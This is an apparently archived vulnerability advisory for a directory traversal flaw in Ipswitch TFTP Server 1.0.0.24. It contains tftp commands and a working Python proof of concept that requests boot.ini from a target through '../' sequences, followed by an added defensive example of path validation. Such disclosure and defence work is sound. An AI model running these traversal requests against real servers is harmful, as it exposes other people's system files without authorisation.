Ipswitch TFTP Server 1.0.0.24 – Directory Traversal

  • Author: SecPod Research
    Date: 2011-12-02
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/18189/
  • ##############################################################################
    # Title : Ipswitch TFTP Server Directory Traversal Vulnerability
    # Author: Prabhu S Angadi from SecPod Technologies (www.secpod.com)
    # Vendor: http://www.whatsupgold.com/index.aspx
    # Advisory: http://secpod.org/blog/?p=424
    # http://secpod.org/advisories/SecPod_Ipswitch_TFTP_Server_Dir_Trav.txt
    # http://secpod.org/exploits/SecPod_Ipswitch_TFTP_Server_Dir_Trav_POC.py
    # Version : Ipswitch TFTP Server 1.0.0.24
    # Date: 02/12/2011
    ##############################################################################
    
    SecPod ID: 1028					13/09/2011 Issue Discovered
    						04/10/2011 Vendor Notified
    						No Response from Vendor
    						02/12/2011 Advisory Released
    
    
    Class: Information Disclosure Severity: Medium
    
    
    Overview:
    ---------
    Ipswitch TFTP Server 1.0.0.24 is prone to a directory traversal
    vulnerability.
    
    
    Technical Description:
    ----------------------
    The vulnerability is caused by improper validation of Read Requests
    containing '../' sequences, which allows attackers to read arbitrary
    files.
    
    
    Impact:
    --------
    Successful exploitation could allow an attacker to obtain sensitive
    information.
    
    
    Affected Software:
    ------------------
    Ipswitch TFTP Server 1.0.0.24
    
    
    Tested on:
    -----------
    Ipswitch TFTP Server 1.0.0.24 on Windows XP SP3 & Windows 7.
    
    
    References:
    -----------
    http://www.ipswitch.com/
    http://secpod.org/blog/?p=424
    http://www.whatsupgold.com/index.aspx
    http://secpod.org/advisories/SecPod_Ipswitch_TFTP_Server_Dir_Trav.txt
    http://secpod.org/exploits/SecPod_Ipswitch_TFTP_Server_Dir_Trav_POC.py
    
    
    Download Link:
    --------------
    http://www.whatsupgold.com/free-software/network-tools/tftp-server.aspx
    
    
    Proof of Concept:
    ----------------
    tftp> get ../../../../../../../../../../../boot.ini
    tftp> get ../../../../../../../../../../../windows/win.ini
    
    
    Solution:
    ----------
    Not available
    
    
    Risk Factor:
    -------------
    CVSS Score Report:
    ACCESS_VECTOR = NETWORK
    ACCESS_COMPLEXITY = LOW
    AUTHENTICATION = NOT_REQUIRED
    CONFIDENTIALITY_IMPACT = PARTIAL
    INTEGRITY_IMPACT = NONE
    AVAILABILITY_IMPACT = NONE
    EXPLOITABILITY = PROOF_OF_CONCEPT
    REMEDIATION_LEVEL = UNAVAILABLE
    REPORT_CONFIDENCE = CONFIRMED
    CVSS Base Score = 5.0 (AV:N/AC:L/Au:NR/C:P/I:N/A:N)
    CVSS Temporal Score = 4.5
    Risk factor = Medium
    
    
    Credits:
    --------
    Prabhu S Angadi of SecPod Technologies has been credited with the discovery of
    this vulnerability.
    
    
    POC :
    ======
    import sys, socket

    def sendPacket(HOST, PORT, data):
        '''
        Sends UDP Data to a Particular Host on a Specified Port
        with a Given Data and Return the Response
        '''
        udp_sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        udp_sock.sendto(data, (HOST, PORT))
        data = udp_sock.recv(1024)
        udp_sock.close()
        return data

    if __name__ == "__main__":

        if len(sys.argv) < 2:
            print '\tUsage: python exploit.py target_ip'
            print '\tExample : python exploit.py 127.0.0.1'
            print '\tExiting...'
            sys.exit(0)

        HOST = sys.argv[1]  ## The Server IP
        PORT = 69  ## Default TFTP port

        data = "\x00\x01"  ## TFTP Read Request
        data += "../" * 10 + "boot.ini" + "\x00"  ## Read boot.ini file using directory traversal
        data += "netascii\x00"  ## TFTP Type

        ## netascii
        rec_data = sendPacket(HOST, PORT, data)
        print "Data Found on the target : %s " %(HOST)
        print rec_data.strip()
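
The Technical Description above attributes the flaw to missing validation of the filename in a Read Request. The following added example (not from the advisory and not Ipswitch's code) shows the server-side check that closes it: parse the RFC 1350 request, resolve the name against the TFTP root using Windows path rules, and answer with an Access violation ERROR packet when the result leaves the root. The root `C:\TFTP-Root`, the file `configs/sw1.cfg` and all function names are assumptions made for the illustration.

```python
import ntpath
import struct

RRQ, WRQ, ERROR = 1, 2, 5            # RFC 1350 opcodes
ACCESS_VIOLATION, ILLEGAL_OP = 2, 4  # RFC 1350 error codes

def parse_request(packet: bytes):
    """Split an RRQ/WRQ into (opcode, filename, mode): opcode, name NUL, mode NUL."""
    if len(packet) < 4:
        raise ValueError("short packet")
    (opcode,) = struct.unpack("!H", packet[:2])
    fields = packet[2:].split(b"\x00")
    if opcode not in (RRQ, WRQ) or len(fields) < 3 or not fields[0]:
        raise ValueError("malformed request")
    return opcode, fields[0].decode("ascii"), fields[1].decode("ascii").lower()

def resolve_in_root(root: str, filename: str) -> str:
    """Map a requested name to a path under root; raise if it would leave root."""
    name = filename.replace("/", "\\")          # Windows accepts both separators
    if ":" in name or name.startswith("\\"):    # drive letter, ADS, UNC, rooted path
        raise PermissionError("absolute path refused")
    root_abs = ntpath.normpath(root)
    target = ntpath.normpath(ntpath.join(root_abs, name))  # collapses ".." segments
    if ntpath.commonpath([root_abs, target]) != root_abs:
        raise PermissionError("path escapes TFTP root")
    return target

def error_packet(code: int, message: str) -> bytes:
    """Build a TFTP ERROR packet: opcode 5, error code, message, NUL."""
    return struct.pack("!HH", ERROR, code) + message.encode("ascii") + b"\x00"

def handle_request(root: str, packet: bytes):
    """Return ("ok", resolved_path) or ("error", ERROR packet) for one request."""
    try:
        _, filename, _ = parse_request(packet)
        return "ok", resolve_in_root(root, filename)
    except PermissionError as exc:
        return "error", error_packet(ACCESS_VIOLATION, str(exc))
    except ValueError:
        return "error", error_packet(ILLEGAL_OP, "illegal TFTP operation")

if __name__ == "__main__":
    ROOT = r"C:\TFTP-Root"  # assumed root directory, not from the advisory
    # Constructed inputs: the advisory's traversal name and a benign request.
    for pkt in (b"\x00\x01" + b"../" * 10 + b"boot.ini\x00netascii\x00",
                b"\x00\x01configs/sw1.cfg\x00octet\x00"):
        print(handle_request(ROOT, pkt))
```

The check here is purely lexical; a production server would additionally resolve junctions and symlinks on the real filesystem before the containment comparison.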